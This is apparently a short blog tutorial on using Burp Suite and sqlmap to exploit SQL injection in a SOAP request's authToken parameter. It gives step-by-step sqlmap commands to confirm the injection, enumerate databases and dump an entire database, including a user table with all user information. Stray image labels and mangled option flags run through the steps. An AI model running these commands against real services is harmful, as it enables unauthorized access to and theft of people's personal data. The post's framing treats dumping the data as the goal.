To test (and exploit) a SOAP message for SQL injection do the following :

  1. Capture the request in Burpsuite (switch on intercept for the request).
  2. Copy the whole request and save it as a file (You could also check if specific parameters in the request is vulnerable to SQL – in my example the I replace the authToken parameter with a ‘ and I get a “nice” error message back in the response. burpsql2burpsql
  3. Use the following SQL command : sqlmap -r /root/Documents/wsdl.txt -p authToken where </root/Documents.wsdl.txt> is the file you saved and <authtoken> is the parameter that you want to test for SQLi1.jpeg
  4. The parameter is vulnerable and we are informed the backed database is MySQL. 2.jpeg
  5. We can now move onto getting some information from the database. Enumerate the database: sqlmap -r /root/Documents/wsdl.txt -p authToken –dbs.5
  6. We find the database we are after – in this example the database containing users called email3
  7. 4
  8. Next stop : Dump everything:s qlmap -r /root/Documents/wsdl.txt -p authToken –dbs –dump5
  9. We get what we are after. The whole database with a table called user and all the user information
  10. 6

 

Published by rl8ball

2 thoughts on “Using SQLMAP on a SOAP request

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s